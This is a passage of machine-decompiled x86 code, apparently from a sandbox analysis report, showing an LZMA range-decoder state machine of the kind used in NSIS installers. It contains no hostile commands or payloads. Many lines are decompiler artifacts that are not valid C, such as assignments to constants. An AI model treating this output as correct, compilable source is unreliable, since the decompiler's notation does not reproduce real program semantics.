                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                          										case 0:
                          											if( *(_t612 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t534 =  *( *(_t612 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t569);
                          											_push(9);
                          											_pop(_t570);
                          											_t608 = _t538 / _t569;
                          											_t540 = _t538 % _t569 & 0x000000ff;
                          											asm("cdq");
                          											_t603 = _t540 % _t570 & 0x000000ff;
                          											 *(_t612 - 0x3c) = _t603;
                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                          												L10:
                          												if(_t611 == 0) {
                          													L12:
                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t611 = _t611 - 1;
                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                          												} while (_t611 != 0);
                          												goto L12;
                          											}
                          											if( *(_t612 - 4) != 0) {
                          												GlobalFree( *(_t612 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t612 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t45 = _t612 - 0x48;
                          											 *_t45 =  *(_t612 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t612 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t612 - 0x40);
                          											if(_t546 ==  *(_t612 - 0x74)) {
                          												L20:
                          												 *(_t612 - 0x48) = 5;
                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t612 - 0x74) = _t546;
                          											if( *(_t612 - 8) != 0) {
                          												GlobalFree( *(_t612 - 8)); // executed
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                          											 *(_t612 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                          											 *(_t612 - 0x84) = 6;
                          											 *(_t612 - 0x4c) = _t553;
                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											_t67 = _t612 - 0x70;
                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                          											if( *(_t612 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t605;
                          											_t588 = _t531 & 0x0000ffff;
                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                          											if( *(_t612 - 0xc) >= _t564) {
                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                          												 *(_t612 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
                          												__eflags = _t532;
                          												 *_t605 = _t532;
                          											} else {
                          												 *(_t612 - 0x10) = _t564;
                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                          											}
                          											if( *(_t612 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 5;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t533 =  *(_t612 - 0x84);
                          											goto L140;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L100:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t335 = __ebp - 0x70;
                          											 *_t335 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t335;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L102;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L110:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t366 = __ebp - 0x70;
                          											 *_t366 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t366;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L112;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											L132:
                          											 *(_t612 - 0x54) = _t605;
                          											goto L133;
                          										case 0x12:
                          											goto L0;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												goto L144;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											goto L130;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											L140:
                          											 *(_t612 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L121;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											goto L145;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											goto L149;
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L120:
                          												_t394 = __ebp - 0x2c;
                          												 *_t394 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t394;
                          												L121:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t401 = __ebp - 0x60;
                          												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t401;
                          												goto L124;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L103:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L109:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L113:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t392 = __ebp - 0x2c;
                          														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t392;
                          														goto L120;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L112:
                          														_t369 = __ebp - 0x48;
                          														 *_t369 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t369;
                          														goto L113;
                          													} else {
                          														goto L110;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
